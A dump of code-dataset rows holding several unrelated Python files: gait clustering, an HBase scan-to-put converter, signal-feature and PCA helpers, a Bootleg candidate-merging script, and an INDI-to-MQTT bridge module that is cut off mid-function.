id stringlengths 1 7 | text stringlengths 6 1.03M | dataset_id stringclasses 1
value |
|---|---|---|
1696658 | import numpy as np
from gait import *
import cv2
import os
import pickle
kmeans = kmean_train(subject='001',choice='bg-01',override=True)
ret = supervision(kmeans,override=True)
if ret:
a = fetch_labels()
| StarcoderdataPython |
1798234 | #!/usr/bin/python3
import sys
import re
import numpy as np
import argparse
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--file", dest="source_file", help="File with Scan commands")
parser.add_argument("-o", "--output", dest="output_file", help="File generated with Put Commands")
options = parser.parse_args()
if not options.source_file:
parser.error("[-] Please specify a target ip, --help for more info.")
return options
def get_data_lines(completeStr):
print("Getting Data Lines")
for dataLine in re.finditer(r".*column.*timestamp.*value.*", completeStr):
yield dataLine.group(0)
def extract_data_in_line(line):
key, column, value = np.array(line.split(' ')).take([1, 2, 4])
column = column.replace('column=', '').replace(',', '')
value = value.replace('value=', '')
return (key, column, value)
def extract_put_data_in_string(strScan):
patternToExtract = r"(?P<key>.*)(?: column=)(?P<column>.*)(?:\,\stimestamp=.*,\svalue=)(?P<value>.*)"
return re.findall(patternToExtract, strScan)
def generate_put_command(table, key, column, value):
return "put '{}','{}','{}','{}'".format(table.strip(), key.strip(), column.strip(), value.strip())
def data_to_put_commands(mapData):
print("Generating put commands for data")
for data in mapData:
key, column, value = data
yield generate_put_command(tableName, key, column, value)
def save_put_file(fileName, putList):
print("Saving put file")
with open(fileName, 'w') as f:
for put in putList:
f.write(put + "\n")
def get_table_name(fString):
# Find Table Name
print("Getting table name")
searchTableName = re.search(r"(scan\s\')([\w|\.]+)", fString)
if searchTableName:
return searchTableName.group(2)
print("Can't find a table name")
sys.exit(1)
options = get_arguments()
file_name = options.source_file
put_file = options.output_file
print("Reading file {}".format(file_name))
with open(file_name) as f:
fString = f.read()
tableName = get_table_name(fString)
save_put_file(put_file,
[put for put in data_to_put_commands(extract_put_data_in_string(fString))])
| StarcoderdataPython |
94096 | import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from sklearn import decomposition
import scipy.signal
import os
import pandas as pd
from skimage.transform import resize
def get_mean(signal: np.ndarray, axis=0):
return signal.mean(axis=axis)
def get_std_dev(signal: np.ndarray, axis=0):
return signal.std(axis=axis)
def get_power(signal: np.ndarray, axis=0, fs=1000):
f_welch, S_xx_welch = scipy.signal.welch(signal, fs=fs, axis=0)
df_welch = f_welch[1] - f_welch[0]
return np.sum(S_xx_welch, axis=axis) * df_welch
def get_energy(signal: np.ndarray, axis=0):
N = signal.shape[0]
Xk = np.fft.fft(signal)
return np.sum(np.abs(Xk) ** 2, axis=axis) / N
def pca(data: np.ndarray, labels: np.ndarray, n_components=3):
X = data.copy()
y = labels.copy()
fig = plt.figure(1, figsize=(4, 3))
plt.clf()
ax = Axes3D(fig=fig,auto_add_to_figure=False, rect=[0, 0, .95, 1], elev=48, azim=134)
fig.add_axes(ax)
plt.cla()
pca = decomposition.PCA(n_components=n_components)
pca.fit(X)
X = pca.transform(X)
for name, label in [('box', 0), ('pufa', 1), ('profil', 2), ('gasnica',3)]:
ax.text3D(X[y == label, 0].mean(),
X[y == label, 1].mean() + 1.5,
X[y == label, 2].mean(), name,
horizontalalignment='center',
bbox=dict(alpha=.5, edgecolor='w', facecolor='w'))
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.nipy_spectral,
edgecolor='k')
ax.w_xaxis.set_ticklabels([])
ax.w_yaxis.set_ticklabels([])
ax.w_zaxis.set_ticklabels([])
plt.show()
def check_pca(path_to_data):
data_dirs = []
class_names = []
class_counter = 0
for subdir, dirs, files in os.walk(path_to_data):
data_dirs.append(subdir)
data_dirs.pop(0)
column_names = ["class", "force_x_mean", "force_y_mean", "force_z_mean"]
df_all = pd.DataFrame(columns=column_names)
for subdir in data_dirs:
df_log_file = pd.read_csv(os.path.join(subdir, 'log.csv'))
print(subdir)
for i in range(len(df_log_file)):
forces_path = os.path.join(subdir, os.path.basename(df_log_file.loc[i, 'forces_path']))
df_forces = pd.read_csv(os.path.join('', forces_path))
# standaryzacja
# df_forces['0'] = (df_forces['0']-df_forces['0'].mean())/df_forces['0'].std()
# df_forces['1'] = (df_forces['1'] - df_forces['1'].mean()) / df_forces['1'].std()
# df_forces['2'] = (df_forces['2'] - df_forces['2'].mean() )/ df_forces['2'].std()
#
df_f_x = df_forces['0'].mean()
df_f_y = df_forces['1'].mean()
df_f_z = df_forces['2'].mean()
df_all = df_all.append(
{"class": int(class_counter), "force_x_mean": float(df_f_x), "force_y_mean": float(df_f_y),
"force_z_mean": float(df_f_z)}, ignore_index=True)
class_counter += 1
print(df_all)
labels = df_all['class'].to_numpy()
data = df_all.loc[:, df_all.columns != 'class'].to_numpy()
pca(data,labels)
def df_resample(df1, num=1):
df2 = pd.DataFrame()
for key, value in df1.iteritems():
temp = value.to_numpy() / value.abs().max() # normalize
resampled = resize(temp, (num, 1), mode='edge') * value.abs().max() # de-normalize
df2[key] = resampled.flatten().round(2)
return df2
def preprocess_data(path_to_data):
data_dirs = []
class_names = []
class_counter = 0
for subdir, dirs, files in os.walk(path_to_data):
data_dirs.append(subdir)
data_dirs.pop(0)
column_names = ["force_x_mean", "force_y_mean", "force_z_mean",
"quat_0_x", "quat_0_y", "quat_0_z", "quat_0_w",
"quat_1_x", "quat_1_y", "quat_1_z", "quat_1_w",
"quat_2_x", "quat_2_y", "quat_2_z", "quat_2_w",
"quat_3_x", "quat_3_y", "quat_3_z", "quat_3_w"]
for subdir in data_dirs:
df_log_file = pd.read_csv(os.path.join(subdir, 'log.csv'))
for i in range(len(df_log_file)):
forces_path = os.path.join(subdir, os.path.basename(df_log_file.loc[i, 'forces_path']))
df_forces = pd.read_csv(os.path.join('', forces_path))
quat_path = os.path.join(subdir, os.path.basename(df_log_file.loc[i, 'quat_path']))
df_quat = pd.read_csv(os.path.join('', quat_path))
df_forces = df_forces.rename(columns={"0": "force_x_mean",
"1": "force_y_mean",
"2": "force_z_mean"})
df_quat = df_quat.rename(columns={"0": "quat_0_x",
"1": "quat_0_y",
"2": "quat_0_z",
"3": "quat_0_w",
"4": "quat_1_x",
"5": "quat_1_y",
"6": "quat_1_z",
"7": "quat_1_w",
"8": "quat_2_x",
"9": "quat_2_y",
"10": "quat_2_z",
"11": "quat_2_w",
"12": "quat_3_x",
"13": "quat_3_y",
"14": "quat_3_z",
"15": "quat_3_w"
})
df_forces = df_forces.drop(['Unnamed: 0'], axis=1)
df_quat = df_quat.drop(['Unnamed: 0'], axis=1)
df_forces = df_resample(df_forces, 3000)
df_quat = df_resample(df_quat, 3000)
df_combined = pd.concat([df_forces,df_quat], axis=1)
df_combined.plot()
plt.show()
def plot_data(path_to_data):
data_dirs = []
class_names = []
class_counter = 0
for subdir, dirs, files in os.walk(path_to_data):
data_dirs.append(subdir)
data_dirs.pop(0)
column_names = ["class", "force_x_mean", "force_y_mean", "force_z_mean",
"quat_0_x", "quat_0_y", "quat_0_z", "quat_0_w",
"quat_1_x", "quat_1_y", "quat_1_z", "quat_1_w",
"quat_2_x", "quat_2_y", "quat_2_z", "quat_2_w",
"quat_3_x", "quat_3_y", "quat_3_z", "quat_3_w"]
df_data = pd.DataFrame(columns=column_names)
for subdir in data_dirs:
df_log_file = pd.read_csv(os.path.join(subdir, 'log.csv'))
for i in range(len(df_log_file)):
forces_path = os.path.join(subdir, os.path.basename(df_log_file.loc[i, 'forces_path']))
df_forces = pd.read_csv(os.path.join('', forces_path))
quat_path = os.path.join(subdir, os.path.basename(df_log_file.loc[i, 'quat_path']))
df_quat = pd.read_csv(os.path.join('', quat_path))
df_forces = df_resample(df_forces,3000)
df_quat = df_resample(df_quat,3000)
plt.plot(df_forces['0'])
plt.plot(df_quat['0'])
plt.plot(df_quat['1'])
plt.plot(df_quat['2'])
plt.plot(df_quat['3'])
plt.show()
| StarcoderdataPython |
1693348 | """
This file
1. Reads in raw wikipedia sentences from /lfs/raiders7/0/lorr1/sentences
2. Reads in map of WPID-Title-QID from /lfs/raiders7/0/lorr1/title_to_all_ids.jsonl
3. Computes frequencies for alias-QID over Wikipedia. Keeps only alias-QID mentions which occur > args.min_frequency
4. Merges alias-QID map with alias-QID map extracted from Wikidata
2. Saves alias-qid map as alias_to_qid_filter.json to args.data_dir
After this, run remove_bad_aliases.py
Example run command:
python3.6 -m contextual_embeddings.bootleg_data_prep.curate_aliases
"""
import argparse
import glob
import multiprocessing
import os
import shutil
import time
import numpy as np
import ujson
import ujson as json
from tqdm import tqdm
from bootleg.symbols.entity_symbols import EntitySymbols
from bootleg.utils import utils
def get_arg_parser():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
"--contextual_cand_data",
type=str,
default="/dfs/scratch0/lorr1/projects/bootleg-data/data/medmentions_0203/files",
help="Where files saved",
)
parser.add_argument(
"--entity_dump",
type=str,
default="/dfs/scratch0/lorr1/projects/bootleg-data/data/medmentions_0203/entity_db/entity_mappings",
help="Where files saved",
)
parser.add_argument(
"--data_dir",
type=str,
default="/dfs/scratch0/lorr1/projects/bootleg-data/data/medmentions_0203",
help="Where files saved",
)
parser.add_argument(
"--out_subdir",
type=str,
default="text",
help="Where files saved",
)
parser.add_argument("--train_in_candidates", action="store_true")
parser.add_argument(
"--keep_orig",
action="store_true",
help="This will keep the original Bootleg maps but add contextual candidates to max out at 30",
)
parser.add_argument("--max_candidates", type=int, default=int(30))
parser.add_argument("--processes", type=int, default=int(1))
return parser
def init_process(entity_dump_f):
global ed_global
ed_global = EntitySymbols.load_from_cache(load_dir=entity_dump_f)
def merge_data(
num_processes,
train_in_candidates,
keep_orig,
max_candidates,
file_pairs,
entity_dump_f,
):
# File pair is in file, cand map file, out file, is_train
# Chunk file for parallel writing
create_ex_indir = os.path.join(
os.path.dirname(file_pairs[0]), "_bootleg_temp_indir"
)
utils.ensure_dir(create_ex_indir)
create_ex_indir_cands = os.path.join(
os.path.dirname(file_pairs[0]), "_bootleg_temp_indir2"
)
utils.ensure_dir(create_ex_indir_cands)
create_ex_outdir = os.path.join(
os.path.dirname(file_pairs[0]), "_bootleg_temp_outdir"
)
utils.ensure_dir(create_ex_outdir)
print(f"Counting lines")
total_input = sum(1 for _ in open(file_pairs[0]))
total_input_cands = sum(1 for _ in open(file_pairs[1]))
assert (
total_input_cands == total_input
), f"{total_input} lines of orig data != {total_input_cands} of cand data"
chunk_input_size = int(np.ceil(total_input / num_processes))
total_input_from_chunks, input_files_dict = utils.chunk_file(
file_pairs[0], create_ex_indir, chunk_input_size
)
total_input_cands_from_chunks, input_files_cands_dict = utils.chunk_file(
file_pairs[1], create_ex_indir_cands, chunk_input_size
)
input_files = list(input_files_dict.keys())
input_cand_files = list(input_files_cands_dict.keys())
assert len(input_cand_files) == len(input_files)
input_file_lines = [input_files_dict[k] for k in input_files]
input_cand_file_lines = [input_files_cands_dict[k] for k in input_cand_files]
for p_l, p_r in zip(input_file_lines, input_cand_file_lines):
assert (
p_l == p_r
), f"The matching chunk files don't have matching sizes {p_l} versus {p_r}"
output_files = [
in_file_name.replace(create_ex_indir, create_ex_outdir)
for in_file_name in input_files
]
assert (
total_input == total_input_from_chunks
), f"Lengths of files {total_input} doesn't match {total_input_from_chunks}"
assert (
total_input_cands == total_input_cands_from_chunks
), f"Lengths of files {total_input_cands} doesn't match {total_input_cands_from_chunks}"
# file_pairs is input file, cand map file, output file, is_train
input_args = [
[
train_in_candidates,
keep_orig,
max_candidates,
input_files[i],
input_file_lines[i],
input_cand_files[i],
output_files[i],
file_pairs[3],
]
for i in range(len(input_files))
]
pool = multiprocessing.Pool(
processes=num_processes, initializer=init_process, initargs=[entity_dump_f]
)
new_alias2qids = {}
total_seen = 0
total_dropped = 0
for res in pool.imap(merge_data_hlp, input_args, chunksize=1):
temp_alias2qids, seen, dropped = res
total_seen += seen
total_dropped += dropped
for k in temp_alias2qids:
assert k not in new_alias2qids, f"{k}"
new_alias2qids[k] = temp_alias2qids[k]
print(
f"Overall Recall for {file_pairs[0]}: {(total_seen - total_dropped) / total_seen} for seeing {total_seen}"
)
# Merge output files to final file
print(f"Merging output files")
with open(file_pairs[2], "wb") as outfile:
for filename in glob.glob(os.path.join(create_ex_outdir, "*")):
if filename == file_pairs[2]:
# don't want to copy the output into the output
continue
with open(filename, "rb") as readfile:
shutil.copyfileobj(readfile, outfile)
# Remove temporary files/folders
shutil.rmtree(create_ex_indir)
shutil.rmtree(create_ex_indir_cands)
shutil.rmtree(create_ex_outdir)
return new_alias2qids
def merge_data_hlp(args):
(
train_in_candidates,
keep_orig,
max_candidates,
input_file,
total_input,
input_cand_file,
output_file,
is_train,
) = args
sent2cands = {}
sent2probs = {}
new_alias2qids = {}
with open(input_cand_file, "r") as f_in:
for line in tqdm(f_in, total=total_input, desc="Processing cand data"):
line = ujson.loads(line)
if "probs" in line:
sent2probs[line["sent_idx_unq"]] = line["probs"]
sent2cands[line["sent_idx_unq"]] = line["cands"]
total_dropped = 0
total_seen = 0
total_len = 0
with open(input_file) as f_in, open(output_file, "w") as f_out:
tag = os.path.splitext(os.path.basename(input_file))[0]
for line in tqdm(f_in, total=total_input, desc="Processing data"):
line = ujson.loads(line)
sent_idx_unq = line["sent_idx_unq"]
if sent_idx_unq not in sent2cands:
assert (
len(line["aliases"]) == 0
), f"{sent_idx_unq} not in cand maps but there are aliases"
cands = sent2cands[sent_idx_unq]
probs = sent2probs.get(
sent_idx_unq,
[[500 - j for j in range(len(cand_set))] for cand_set in cands],
)
assert len(cands) == len(
line["aliases"]
), f"The length of aliases does not match cands in {sent_idx_unq}"
assert len(probs) == len(
line["aliases"]
), f"The length of aliases does not match probs in {sent_idx_unq}"
new_als, new_qids, new_spans, new_golds = [], [], [], []
new_slices = {}
j = 0
for i in range(len(line["aliases"])):
total_seen += 1
new_al = f"al_{sent_idx_unq}_{i}_{tag}"
new_cand_pairs = [
[c, p]
for c, p in zip(cands[i], probs[i])
if ed_global.qid_exists(c)
]
if keep_orig:
orig_cand_pairs = ed_global.get_qid_count_cands(line["aliases"][i])
assert len(orig_cand_pairs) <= max_candidates
final_cand_pairs = orig_cand_pairs
final_cand_set = set(map(lambda x: x[0], final_cand_pairs))
for ctx_q, ctx_val in sorted(
new_cand_pairs, key=lambda x: x[1], reverse=False
):
if len(final_cand_pairs) >= max_candidates:
break
if ctx_q not in final_cand_set:
final_cand_pairs.append([ctx_q, ctx_val])
else:
final_cand_pairs = new_cand_pairs[:max_candidates]
total_len += len(final_cand_pairs)
# We are training in candidates and gold is not in list, discard
if (
is_train
and train_in_candidates
and line["qids"][i] not in [p[0] for p in final_cand_pairs]
):
total_dropped += 1
continue
new_alias2qids[new_al] = final_cand_pairs
new_als.append(new_al)
new_qids.append(line["qids"][i])
new_spans.append(line["spans"][i])
new_golds.append(line["gold"][i])
for slice_name in line.get("slices", {}):
if slice_name not in new_slices:
new_slices[slice_name] = {}
new_slices[slice_name][str(j)] = line["slices"][slice_name][str(i)]
j += 1
line["old_aliases"] = line["aliases"][:]
line["aliases"] = new_als
line["qids"] = new_qids
line["spans"] = new_spans
line["gold"] = new_golds
line["slices"] = new_slices
f_out.write(ujson.dumps(line) + "\n")
print(
f"Total Seen: {total_seen}, Total Dropped: {total_dropped}, "
f"Recall: {(total_seen - total_dropped) / total_seen}, "
f"Avg Cand Len: {total_len / (total_seen)} for {input_file}"
)
return new_alias2qids, total_seen, total_dropped
def main():
gl_start = time.time()
multiprocessing.set_start_method("spawn")
args = get_arg_parser().parse_args()
print(json.dumps(vars(args), indent=4))
utils.ensure_dir(args.data_dir)
out_dir = os.path.join(args.data_dir, args.out_subdir)
if os.path.exists(out_dir):
shutil.rmtree(out_dir)
os.makedirs(out_dir, exist_ok=True)
# Reading in files
in_files_train = glob.glob(os.path.join(args.data_dir, "*.jsonl"))
in_files_cand = glob.glob(os.path.join(args.contextual_cand_data, "*.jsonl"))
assert len(in_files_train) > 0, f"We didn't find any train files at {args.data_dir}"
assert (
len(in_files_cand) > 0
), f"We didn't find any contextual files at {args.contextual_cand_data}"
in_files = []
for file in in_files_train:
file_name = os.path.basename(file)
tag = os.path.splitext(file_name)[0]
is_train = "train" in tag
if is_train:
print(f"{file_name} is a training dataset...will be processed as such")
pair = None
for f in in_files_cand:
if tag in f:
pair = f
break
assert pair is not None, f"{file_name} name, {tag} tag"
out_file = os.path.join(out_dir, file_name)
in_files.append([file, pair, out_file, is_train])
final_cand_map = {}
max_cands = 0
for pair in in_files:
print(f"Reading in {pair[0]} with cand maps {pair[1]} and dumping to {pair[2]}")
new_alias2qids = merge_data(
args.processes,
args.train_in_candidates,
args.keep_orig,
args.max_candidates,
pair,
args.entity_dump,
)
for al in new_alias2qids:
assert al not in final_cand_map, f"{al} is already in final_cand_map"
final_cand_map[al] = new_alias2qids[al]
max_cands = max(max_cands, len(final_cand_map[al]))
print(f"Buidling new entity symbols")
entity_dump = EntitySymbols.load_from_cache(load_dir=args.entity_dump)
entity_dump_new = EntitySymbols(
max_candidates=max_cands,
alias2qids=final_cand_map,
qid2title=entity_dump.get_qid2title(),
)
out_dir = os.path.join(out_dir, "entity_db/entity_mappings")
entity_dump_new.save(out_dir)
print(f"Finished in {time.time() - gl_start}s")
if __name__ == "__main__":
main()
| StarcoderdataPython |
1717384 | <filename>indi_mr/i_to_m.py
"""Defines blocking function inditomqtt:
Receives XML data from indiserver on port 7624 and publishes via MQTT.
Receives data from MQTT, and outputs to port 7624 and indiserver.
"""
import sys, collections, threading, asyncio
from time import sleep
from datetime import datetime
import xml.etree.ElementTree as ET
from . import toindi, fromindi, tools
MQTT_AVAILABLE = True
try:
import paho.mqtt.client as mqtt
except:
MQTT_AVAILABLE = False
# _STARTTAGS is a tuple of ( b'<defTextVector', ... ) data received will be tested to start with such a starttag
_STARTTAGS = tuple(b'<' + tag for tag in fromindi.TAGS)
# _ENDTAGS is a tuple of ( b'</defTextVector>', ... ) data received will be tested to end with such an endtag
_ENDTAGS = tuple(b'</' + tag + b'>' for tag in fromindi.TAGS)
### MQTT Handlers for inditomqtt
def _inditomqtt_on_message(client, userdata, message):
"Callback when an MQTT message is received"
if message.topic == userdata["pubsnoopcontrol"]:
# The message received on the snoop control topic, is one this device has transmitted, ignore it
return
# On receiving a getproperties on snoop_control/#, checks the name, property to be snooped
if message.topic.startswith(userdata["snoop_control_topic"]+"/"):
try:
root = ET.fromstring(message.payload.decode("utf-8"))
except Exception:
# possible malformed
return
if root.tag != "getProperties":
# only getProperties listenned to on snoop_control_topic
return
devicename = root.get("device")
propertyname = root.get("name")
if propertyname and (not devicename):
# illegal
return
snooptopic, remote_mqtt_id = message.topic.split("/", maxsplit=1)
if not devicename:
# Its a snoop everything request
userdata["sendsnoopall"].add(remote_mqtt_id)
elif not propertyname:
# Its a snoop device request
sendsnoopdevices = userdata["sendsnoopdevices"]
if devicename in sendsnoopdevices:
sendsnoopdevices[devicename].add(remote_mqtt_id)
else:
sendsnoopdevices[devicename] = set((remote_mqtt_id,))
else:
# Its a snoop device/property request
sendsnoopproperties = userdata["sendsnoopproperties"]
if (devicename,propertyname) in sendsnoopproperties:
sendsnoopproperties[devicename,propertyname].add(remote_mqtt_id)
else:
sendsnoopproperties[devicename,propertyname] = set((remote_mqtt_id,))
if message.payload.startswith(b"delProperty"):
try:
root = ET.fromstring(message.payload.decode("utf-8"))
except Exception:
# possible malformed
return
_remove(root, userdata)
# we have received a message from the mqtt server, put it into the data_to_indi buffer
userdata['data_to_indi'].append(message.payload)
def _inditomqtt_on_connect(client, userdata, flags, rc):
"The callback for when the client receives a CONNACK response from the MQTT server, renew subscriptions"
userdata['data_to_indi'].clear() # - start with fresh empty data_to_indi buffer
if rc == 0:
userdata['comms'] = True
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
if userdata["subscribe_list"]:
# subscribe to those remote id's listed
subscribe_list = list((userdata["to_indi_topic"] + "/" + remote_id, 2) for remote_id in userdata["subscribe_list"] )
# gives a list of [(topic1,2),(topic2,2),(topic3,2)]
client.subscribe( subscribe_list )
else:
# subscribe to all remote id's
client.subscribe( userdata["to_indi_topic"] + "/#", 2 )
# Every device subscribes to snoop_control/# being the snoop_control topic and all subtopics
client.subscribe( userdata["snoopcontrol"], 2 )
# and to snoop_data/mqtt_id
client.subscribe( userdata["snoopdata"], 2 )
# Finally, send a getProperties to all devices, so they refresh data
userdata['data_to_indi'].append(b"<getProperties version=\"1.7\" />")
print(f"""MQTT connected""")
else:
userdata['comms'] = False
def _inditomqtt_on_disconnect(client, userdata, rc):
"The MQTT client has disconnected, set userdata['comms'] = False, and clear out any data hanging about in data_to_indi"
userdata['comms'] = False
userdata['data_to_indi'].clear()
def _sendtomqtt(payload, topic, mqtt_client):
"Gets data which has been received from indi, and transmits to mqtt"
result = mqtt_client.publish(topic=topic, payload=payload, qos=2)
result.wait_for_publish()
class _PortHandler:
def __init__(self, loop, userdata, mqtt_client, indiserver):
"Sets the userdata"
self.userdata = userdata
self.loop = loop
self.mqtt_client = mqtt_client
self.indiserver = indiserver
self.topic = userdata["from_indi_topic"] + "/" + userdata["mqtt_id"]
self.snoop_data_topic = userdata["snoop_data_topic"] + "/" # this will always have a remote mqtt_id appended
self.data_to_indi = userdata['data_to_indi']
self.deviceset = userdata['deviceset']
self.sendsnoopall = userdata["sendsnoopall"]
self.sendsnoopdevices = userdata["sendsnoopdevices"]
self.sendsnoopproperties = userdata["sendsnoopproperties"]
async def handle_data(self):
reader, writer = await asyncio.open_connection(self.indiserver.host,self.indiserver.port)
_message(self.topic, self.mqtt_client, f"Connected to {self.indiserver.host}:{self.indiserver.port}")
await asyncio.gather(self.txtoindi(writer), self.rxfromindi(reader))
async def txtoindi(self, writer):
"Pop message from data_to_indi deque, and write it to the port connection"
while True:
if self.data_to_indi:
# Send the next message to the indiserver
to_indi = self.data_to_indi.popleft()
writer.write(to_indi)
await writer.drain()
else:
# no message to send, do an async pause
await asyncio.sleep(0.5)
async def rxfromindi(self, reader):
"""get data received from the port connection, and call _sendtomqtt to send it to MQTT
checks if the data received is to be sent to a snooping device, if so, send it"""
message = b''
messagetagnumber = None
while True:
# get blocks of data from the indiserver
try:
data = await reader.readuntil(separator=b'>')
except asyncio.LimitOverrunError:
data = await reader.read(n=32000)
if not message:
# data is expected to start with <tag, first strip any newlines
data = data.strip()
for index, st in enumerate(_STARTTAGS):
if data.startswith(st):
messagetagnumber = index
break
else:
# check if data received is a b'<getProperties ... />' snooping request
if data.startswith(b'<getProperties '):
# send a snoop request on topic snoop_control/mqtt_id where mqtt_id is its own id
result = await self.loop.run_in_executor(None, _sendtomqtt, data, self.userdata["pubsnoopcontrol"], self.mqtt_client)
# data is either a getProperties, or does not start with a recognised tag, so ignore it
# and continue waiting for a valid message start
continue
# set this data into the received message
message = data
# either further children of this tag are coming, or maybe its a single tag ending in "/>"
if message.endswith(b'/>'):
# the message is complete, handle message here
try:
root = ET.fromstring(message.decode("utf-8"))
except Exception:
# possible malformed
message = b''
messagetagnumber = None
continue
devicename = root.get("device")
# Run '_sendtomqtt' in the default loop's executor:
result = await self.loop.run_in_executor(None, _sendtomqtt, message, self.topic, self.mqtt_client)
# check if this data it to be sent to snooping devices
for mqtt_id in self.sendsnoopall:
# these connections snoop everything
snooptopic = self.snoop_data_topic + mqtt_id
result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client)
if devicename in self.deviceset:
if devicename in self.sendsnoopdevices:
# set of mqtt_id's which snoop this devicename
for mqtt_id in self.sendsnoopdevices[devicename]:
snooptopic = self.snoop_data_topic + mqtt_id
result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client)
propertyname = root.get("name")
if propertyname:
if (devicename,propertyname) in self.sendsnoopproperties:
# set of mqtt_id's which snoop this devicename/propertyname
for mqtt_id in self.sendsnoopproperties[devicename,propertyname]:
snooptopic = self.snoop_data_topic + mqtt_id
result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client)
# and start again, waiting for a new message
if devicename:
self.deviceset.add(devicename)
if root.tag == "delProperty":
# remove this device/property from snooping records
_remove(root, self.userdata)
message = b''
messagetagnumber = None
# and read either the next message, or the children of this tag
continue
# To reach this point, the message is in progress, with a messagetagnumber set
# keep adding the received data to message, until an endtag is reached
message += data
if message.endswith(_ENDTAGS[messagetagnumber]):
# the message is complete, handle message here
try:
root = ET.fromstring(message.decode("utf-8"))
except Exception:
# possible malformed
message = b''
messagetagnumber = None
continue
devicename = root.get("device")
# Run '_sendtomqtt' in the default loop's executor:
result = await self.loop.run_in_executor(None, _sendtomqtt, message, self.topic, self.mqtt_client)
# check if this data it to be sent to snooping devices
for mqtt_id in self.sendsnoopall:
# these connections snoop everything
snooptopic = self.snoop_data_topic + mqtt_id
result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client)
if devicename in self.deviceset:
if devicename in self.sendsnoopdevices:
# set of mqtt_id's which snoop this devicename
for mqtt_id in self.sendsnoopdevices[devicename]:
snooptopic = self.snoop_data_topic + mqtt_id
result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client)
propertyname = root.get("name")
if propertyname:
if (devicename,propertyname) in self.sendsnoopproperties:
# set of mqtt_id's which snoop this devicename/propertyname
for mqtt_id in self.sendsnoopproperties[devicename,propertyname]:
snooptopic = self.snoop_data_topic + mqtt_id
result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client)
# and start again, waiting for a new message
if devicename:
self.deviceset.add(devicename)
if root.tag == "delProperty":
# remove this device/property from snooping records
_remove(root, self.userdata)
message = b''
messagetagnumber = None
def inditomqtt(indiserver, mqtt_id, mqttserver, subscribe_list=[]):
"""Blocking call that provides the indiserver - mqtt connection. If subscribe list is empty
then this function subscribes to received data from all remote mqtt_id's. If it
contains a list of mqtt_id's, then only subscribes to their data.
:param indiserver: Named Tuple providing the indiserver parameters
:type indiserver: namedtuple
:param mqtt_id: A unique string, identifying this connection
:type mqtt_id: String
:param mqttserver: Named Tuple providing the mqtt server parameters
:type mqttserver: namedtuple
:param subscribe_list: List of remote mqtt_id's to subscribe to
:type subscribe_list: List
"""
if not MQTT_AVAILABLE:
print("Error - Unable to import the Python paho.mqtt.client package")
sys.exit(1)
if (not mqtt_id) or (not isinstance(mqtt_id, str)):
print("Error - An mqtt_id must be given and must be a non-empty string.")
sys.exit(1)
# wait for five seconds before starting, to give mqtt and other servers
# time to start up
sleep(5)
print("inditomqtt started")
# The data_to_indi dequeue has the right side filled from redis and the left side
# sent to indiserver.
data_to_indi = collections.deque(maxlen=100)
# create an mqtt client and connection
userdata={ "comms" : False, # an indication mqtt connection is working
"to_indi_topic" : mqttserver.to_indi_topic,
"from_indi_topic" : mqttserver.from_indi_topic,
"snoop_control_topic" : mqttserver.snoop_control_topic,
"snoop_data_topic" : mqttserver.snoop_data_topic,
"mqtt_id" : mqtt_id,
"snoopdata" : mqttserver.snoop_data_topic + "/" + mqtt_id,
"snoopcontrol" : mqttserver.snoop_control_topic + "/#", # used to receive other's getproperty
"pubsnoopcontrol" : mqttserver.snoop_control_topic + "/" + mqtt_id, # used when publishing a getproperty
"subscribe_list" : subscribe_list,
"data_to_indi" : data_to_indi,
"deviceset" : set(), # a set of device names served by this indiserver
"sendsnoopall" : set(), # a set of mqtt_id's which want all data sent to them
"sendsnoopdevices" : {}, # a dictionary of {devicename: set of mqtt_id's, ...}
# which are those connections which snoop the given devicename
"sendsnoopproperties" : {} # a dictionary of {(devicename,propertyname): set of mqtt_id's, ...}
# which are those connections which snoop the given device/property
}
mqtt_client = mqtt.Client(client_id=mqtt_id, userdata=userdata)
# attach callback function to client
mqtt_client.on_connect = _inditomqtt_on_connect
mqtt_client.on_disconnect = _inditomqtt_on_disconnect
mqtt_client.on_message = _inditomqtt_on_message
# If a username/password is set on the mqtt server
if mqttserver.username and mqttserver.password:
mqtt_client.username_pw_set(username = mqttserver.username, password = mqttserver.password)
elif mqttserver.username:
mqtt_client.username_pw_set(username = mqttserver.username)
# connect to the MQTT server
mqtt_client.connect(host=mqttserver.host, port=mqttserver.port)
mqtt_client.loop_start()
# Now create a loop to tx and rx the indiserver port
loop = asyncio.get_event_loop()
indiconnection = _PortHandler(loop, userdata, mqtt_client, indiserver)
while True:
data_to_indi.clear()
data_to_indi.append(b'<getProperties version="1.7" />')
try:
loop.run_until_complete(indiconnection.handle_data())
except ConnectionRefusedError:
_message(mqttserver.from_indi_topic + "/" + mqtt_id, mqtt_client, f"Connection refused on {indiserver.host}:{indiserver.port}, re-trying...")
sleep(5)
except asyncio.IncompleteReadError:
_message(mqttserver.from_indi_topic + "/" + mqtt_id, mqtt_client, f"Connection failed on {indiserver.host}:{indiserver.port}, re-trying...")
sleep(5)
else:
loop.close()
break
def _message(topic, mqtt_client, message):
"Print and send a message to mqtt, as if a message had been received from indiserver"
try:
print(message)
sendmessage = ET.Element('message')
sendmessage.set("message", message)
sendmessage.set("timestamp", datetime.utcnow().isoformat(timespec='seconds'))
_sendtomqtt(ET.tostring(sendmessage), topic, mqtt_client)
except Exception:
pass
return
def _remove(root, userdata):
"A delProperty is received or being sent, remove this device/property from snooping records"
if root.tag != "delProperty":
return
devicename = root.get("device")
if not devicename:
return
propertyname = root.get("name")
if propertyname:
sendsnoopproperties = userdata["sendsnoopproperties"]
if (devicename,propertyname) in sendsnoopproperties:
del sendsnoopproperties[devicename,propertyname]
return
# devicename only
if devicename in userdata['deviceset']:
userdata['deviceset'].remove(devicename)
sendsnoopdevices = userdata["sendsnoopdevices"]
if devicename in sendsnoopdevices:
